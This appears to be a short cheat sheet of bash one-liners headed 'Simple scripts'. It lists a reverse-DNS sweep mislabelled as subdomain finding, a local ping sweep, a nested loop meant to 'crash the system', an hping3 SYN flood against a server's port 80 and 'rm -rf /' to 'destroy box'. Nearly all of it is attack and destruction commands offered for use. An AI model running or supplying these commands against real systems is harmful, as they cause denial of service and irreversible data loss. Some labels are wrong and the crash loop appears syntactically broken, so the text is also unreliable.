Simple scripts:
Finding subdomains:
for i in {1..255..1};do host 8.8.8.$i|grep -v not\ found;done
decuct is ip up:
for i in {1..255..1};do ping 192.168.43.$i|grep bytes;done
crash the system:
while true;do while true;do done;&;done
Syn flood against server with hping3:
hping3 -S --flood x.x.x.x -p 80
destroy box , rm all files:
rm -rf /
Thanks!